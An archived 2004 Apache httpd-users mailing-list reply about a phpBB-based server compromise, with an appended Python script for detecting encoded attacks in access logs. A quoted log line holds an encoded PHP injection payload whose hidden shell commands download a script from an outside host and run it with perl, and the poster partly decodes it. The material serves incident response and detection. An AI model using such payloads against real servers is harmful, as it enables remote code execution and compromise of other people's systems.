httpd-users mailing list archives

From Shannon Eric Peevey <spee...@unt.edu>
Subject Re: [users@httpd] Security issue with 2.0.50
Date Sat, 04 Dec 2004 17:02:08 GMT
Arthur Kerpician wrote:

>>
> I got to the bottom of it and this is what I had found:
> forum.protected.com-access_log:200.140.216.79 - - 
> [04/Dec/2004:06:55:54 +0200] "GET 
> /viewtopic.php?t=139&highlight=%2527%252esystem(chr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(117)%252echr(110)%252echr(99)%252echr(111)%252echr(109)%252echr(101)%252echr(99)%252echr(111)%252echr(59)%252echr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(118)%252echr(97)%252echr(114)%252echr(47)%252echr(116)%252echr(109)%252echr(112)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(104)%252echr(116)%252echr(116)%252echr(112)%252echr(58)%252echr(47)%252echr(47)%252echr(104)%252echr(111)%252echr(111)%252echr(98)%252echr(46)%252echr(119)%252echr(101)%252echr(98)%252echr(99)%252echr(105)%252echr(110)%252echr(100)%252echr(97)%252echr(114)%252echr(105)%252echr(111)%252echr(46)%252echr(99)%252echr(111)%252echr(109)%252echr(47)%252echr(100)%252echr(48)%252echr(115)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(100)%252echr(48)%252echr(115)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(117)%252echr(110)%252echr(102)%252echr(105)%252echr(109))%252e%2527

> HTTP/1.0" 200 13994
>
> It seems that the gateway for my server's vulnerability was 
> phpBB-2.0.4. If you convert the ASCII in the URL to chars it will give you 
> this:
> echo uncomeco;cd /var/tmp;wget http://hoob.webcindario.com/bla..bla...
> Eric, you were right by giving me the example with pollvote...that 
> made me look into all sites' logs hosted on that server. The forum was 
> the only site which recorded this kind of request (I did a `grep 
> echr /www/logs/*access_log*` on all access logs). There were several 
> records like the one above with IPs coming from Brazil, Dominican 
> Republic, Spain, Germany, AOL...I guess untraceable proxies.
>
> I upgraded today to phpBB-2.0.11, the latest stable release tagged by 
> the authors as "critical update". Thanks all for your fast replies, 
> I'll keep posting on the subject if the matter isn't solved.
>
Arthur,

Great!!  Yeah, there are all kinds of SQL injection issues in 
phpBB-2.0.10, so it's good you have 2.0.11 installed now.  I know this is 
an Apache list, but I should follow this up with the location of the patch 
for anyone that is not able to upgrade to phpBB-2.0.11 yet:

http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513

Ivan, if you see how phpBB2 is dealing with safe_mode=On, they have you 
create a tmp dir under the bulletin board root chmod'd to 777...  Your 
guess is as good as mine as to the actual security of this fix.  It 
seems to me that safe_mode is still largely ignored by many PHP 
application developers (photo galleries in particular), so it might not 
be feasible to run your application in safe_mode.  I didn't explore the 
exact vulnerability in pollvote.php, but I assume it must be a weakness 
in form validation.

see ya'll,

-- 
Shannon Eric Peevey                     =>  "speeves"
Dyno-Mite! System Administrator         =>  speeves@unt.edu
Central Web Support                     =>  (940) 369-8876
University of North Texas               =>  http://web2.unt.edu



---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
   "   from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
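
An added example, not part of the original thread: a Python triage script for the pattern found in the access log above, a query string that is percent-encoded more than once and hides a string in a chain of chr() calls. The sample log lines are constructed (documentation IP addresses, payload cut to the first four chr() calls of the quoted request), and the function names are this example's own.

```python
import re
from urllib.parse import unquote

# Constructed sample lines (documentation IPs; payload cut to four chr() calls).
SAMPLE_LOG = [
    '192.0.2.10 - - [04/Dec/2004:06:50:01 +0200] '
    '"GET /viewtopic.php?t=139&highlight=apache HTTP/1.0" 200 13994',
    'forum-access_log:192.0.2.77 - - [04/Dec/2004:06:55:54 +0200] '
    '"GET /viewtopic.php?t=139&highlight=%2527%252esystem(chr(101)%252echr(99)'
    '%252echr(104)%252echr(111))%252e%2527 HTTP/1.0" 200 13994',
]

# Optional "file:" prefix (added by grep over several files), client, time, URI.
REQUEST = re.compile(
    r'^(?:[^:\s]+:)?(\d{1,3}(?:\.\d{1,3}){3}) \S+ \S+ \[([^\]]+)\] "\S+ (\S+)')
CHR_CALL = re.compile(r"chr\((\d{1,3})\)", re.I)
# Two or more chr(N) calls joined by PHP's "." concatenation operator.
CHR_CHAIN = re.compile(r"chr\(\d{1,3}\)(?:\s*\.\s*chr\(\d{1,3}\))+", re.I)

def fully_unquote(text, max_rounds=5):
    """Percent-decode until the text stops changing; return (text, rounds)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(text)
        if decoded == text:
            break
        text, rounds = decoded, rounds + 1
    return text, rounds

def decode_chr_chains(text):
    """Turn each chr(a).chr(b)... chain into the string it spells."""
    return ["".join(chr(int(n)) for n in CHR_CALL.findall(m.group(0)))
            for m in CHR_CHAIN.finditer(text)]

def triage(line):
    """Return a finding for a suspicious request line, else None."""
    m = REQUEST.match(line)
    if not m:
        return None
    client, when, uri = m.groups()
    decoded, rounds = fully_unquote(uri)
    hidden = decode_chr_chains(decoded)
    # Flag multi-layer encoding or any chr() chain; one layer alone is normal.
    if rounds < 2 and not hidden:
        return None
    return {"client": client, "time": when, "encoding_rounds": rounds,
            "decoded_uri": decoded, "hidden_strings": hidden}

def scan(lines):
    return [f for f in map(triage, lines) if f]
```

Feeding real access-log lines to `scan()` gives one record per flagged request, with the client address, the number of encoding layers, and the plain-text strings hidden behind the chr() calls.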

